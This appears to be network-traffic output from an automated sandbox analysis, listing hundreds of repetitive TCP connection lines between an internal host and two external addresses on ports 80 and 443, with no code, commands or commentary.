Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
